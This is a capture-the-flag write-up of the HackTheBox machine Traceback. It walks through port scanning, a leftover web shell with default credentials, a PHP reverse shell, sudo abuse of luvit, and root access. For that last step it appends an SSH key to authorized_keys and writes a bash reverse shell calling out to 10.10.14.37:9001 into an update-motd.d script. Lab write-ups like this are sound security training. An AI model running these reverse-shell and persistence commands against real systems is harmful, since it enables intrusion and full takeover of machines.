Traceback Write-Up - HackTheBox

3 minute read

Summary

Traceback was an easy-rated, Linux machine made by Xh4H on HackTheBox that allowed some Lua interaction and unique escalation of privileges. The port scan showed SSH and an Apache server running on port 80. Looking at the web server, it showed a compromised web page with an interesting comment in the source code referring to the “best web shells you might need.” Googling that comment revealed a Github repository with various webshells. I created a wordlist with the names of the webshells and did a quick enum of the root directory of the server and it revealed an active web shell. Utilizing the web shell, I uploaded and executed my own php reverse shell as not to disturb other HackTheBox members. Logged in as the webadmin user I quickly discovered that I had sudo privilege to run /home/sysadmin/luvit as the sysadmin user, which allowed execution of bash as that user. Continuing on I noticed an interesting update to /etc/update-motd.d/ being by root. That, coupled with an interesting set of group permissions that allowed the sysadmin user to write to /etc/update-motd.d/ I began to explore a vector. The update-motd.d scripts are executed by the root user at each interactive shell login. Therefore, since we have write ability to those files, we could essentially execute a command as the root user once triggering a login. I echo’d in a public key into sysadmin’s authorized_keys file to be able to trigger a login and echo’d in a simple bash reverse shell in the /etc/update-motd.d/00-header file. I set up a listener and logged in via SSH to sysadmin triggering a shell as root on my listener.

Nmap Port Scan

nmap -sCV -Pn -n -p- -T4 -oN nmap/full-traceback 10.10.10.181

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 15:41 EDT
Nmap scan report for 10.10.10.181
Host is up (0.027s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Enumeration

Rustbuster revealed a shell.php file (at the time I didn’t realize it was another HTB member). Essentially, nothing useful here. /opt/rustbuster/rustbuster dir -u http://10.10.10.181/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php

A look at the pwned web page telling us he left a backdoor. How Nice!

Interesting comment left in the source code:

Searching Google for the string Some of the best web shells that you might need reveals a Github repository with… you guessed it - Web Shells! https://github.com/TheBinitGhimire/Web-Shells

I compiled a list of the filenames of the web-shells and ran it through rustbuster:

Going to the shell, we get a login prompt.

Browsing the source code of the web-shell, the creds are admin/admin. It appears other HTB users are here, so not to disturb I will upload my own reverse TCP PHP script to get a shell.

Initial Access

Browsing to my shell to execute, we get a return on the listener.

As a quick win, I always check sudo permissions of the user I’m logged in as.

Ah, a note left for us. How considerate!

Pivoting To SysAdmin

Between the note and the discovered sudo permission, we can use Luvit to execute a shell as the sysadmin user.

Reference for os.execute: http://lua-users.org/wiki/OsLibraryTutorial

This allowed us to capture the user flag.

During enumeration with linPEAS the first thing I noticed was Root was running this command:

root /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

In addition we had some interesting permissions:

According to Ubuntu, the update-motd.d scripts are executed by the root user at each interactive shell login. Therefore, since we have write ability to those files, we could essentially execute a command as the root user once triggering a login. Ref: http://manpages.ubuntu.com/manpages/trusty/man5/update-motd.5.html

The first thing I did was establish the ability to easily log in by adding a public key to Sysadmin’s authorized_keys.

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDSNvfyEGfS+x+g6G7FLv9bVfvOOmfQC9Ot7P/IxDaSKKVsU8fbebwLBw+Ts2QyLAqejmCauO8Rc5vi1opAuFF/a6rIfduXO1BUSDtvbQQ9Qz3JEmSILUL3N8doPEVjAooGH04IPL4++ObrbKkkrRLmicVJHYTehlYhUTtVhcgVLN9wqJgkRYeSDu/EBSrWBZuulzGwpXYH8mG3KjWHK+5E0PZLyYWIdIiOLHVDPgAWH++agnnz7Jei8YhBt6FoJMHFZtUQ0jM1jmSCLoKGO2GAeD0+KQFfuXlf3Z5JH527v89vFJWBTRkFyuGjTDoEU07qZPSYcmnxPStiJmDHZMMvQiF9lYOadq1MnDG36SAFAFs78/gJI9Apybn78peXSD9auqoQ73LBn9SwUiHcA1/rExmD9jCA82sQjltpwHyl5bSH4/VgaJl41w9GaF+puz+rdBfikxz8GCDpQZxSgSpzIMY6IwyPWF6uH1HJLhG5oXrvfsCXMYL/kc2+7hXo6Y0= kali@kali" >> /home/sysadmin/.ssh/authorized_keys

And We’re Root

Next, I set up a netcat listener on port 9001. I echo’d a Bash Reverse Shell into the 00-header file, and logged in via SSH with Sysadmin to trigger the MOTD execution. And it worked!

echo "bash -c 'bash -i >& /dev/tcp/10.10.14.37/9001 0>&1'" >> /etc/update-motd.d/00-header